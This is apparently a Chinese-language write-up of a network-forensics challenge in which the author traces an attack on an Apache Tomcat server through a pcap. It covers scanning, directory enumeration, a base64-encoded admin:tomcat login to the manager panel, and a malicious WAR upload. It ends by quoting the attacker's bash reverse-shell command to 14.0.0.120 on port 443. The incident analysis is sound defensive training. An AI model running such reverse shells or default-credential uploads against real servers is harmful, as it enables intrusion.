我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况,团队捕获了网络流量进行分析。此 pcap 文件可能包含一系列恶意活动,这些活动已导致 Apache Tomcat Web 服务器遭到破坏。我们需要进一步调查这一事件。
使用wireshark工具直接打开下载好的pcap数据包,然后根据端口大小进行排序,我们发现14.0.0.120 对 10.0.0.112 设备从23端口开始进行递归探测

所以此题的答案为14.0.0.120
因为这个题目是歪果仁出的,所以不建议使用国内的ip地址查询,使用国外的,否则答案就是错的


很显然,真相只有一个,那就是8080
竟然是枚举目录,那我们直接找404

随便选一个,进行http追踪

特征已经很明显了,虽然不知道这个工具是啥,但是确定就是他了

这道题其实承上启下,人家问的是与管理面板关联的目录,所以我们不能光看200请求码,还需要看有登录标识的

很显然,是manager
直接找到最后一个401的下一个数据包就行

追踪流

YWRtaW46dG9tY2F0
使用葵爷进行base64解码

直接找上传数据包

追踪流

好好好,war包上传getshell是吧
JXQOZY.war
这里就不能追踪http请求了,我们需要回到最初始的状态,直接找getshell成功后,第一次访问这个shell的后面的数据包

为啥看这个呢,因为8080war包上传后最后通过shell控制的当然还是80端口

结果显而易见
/bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’
so easy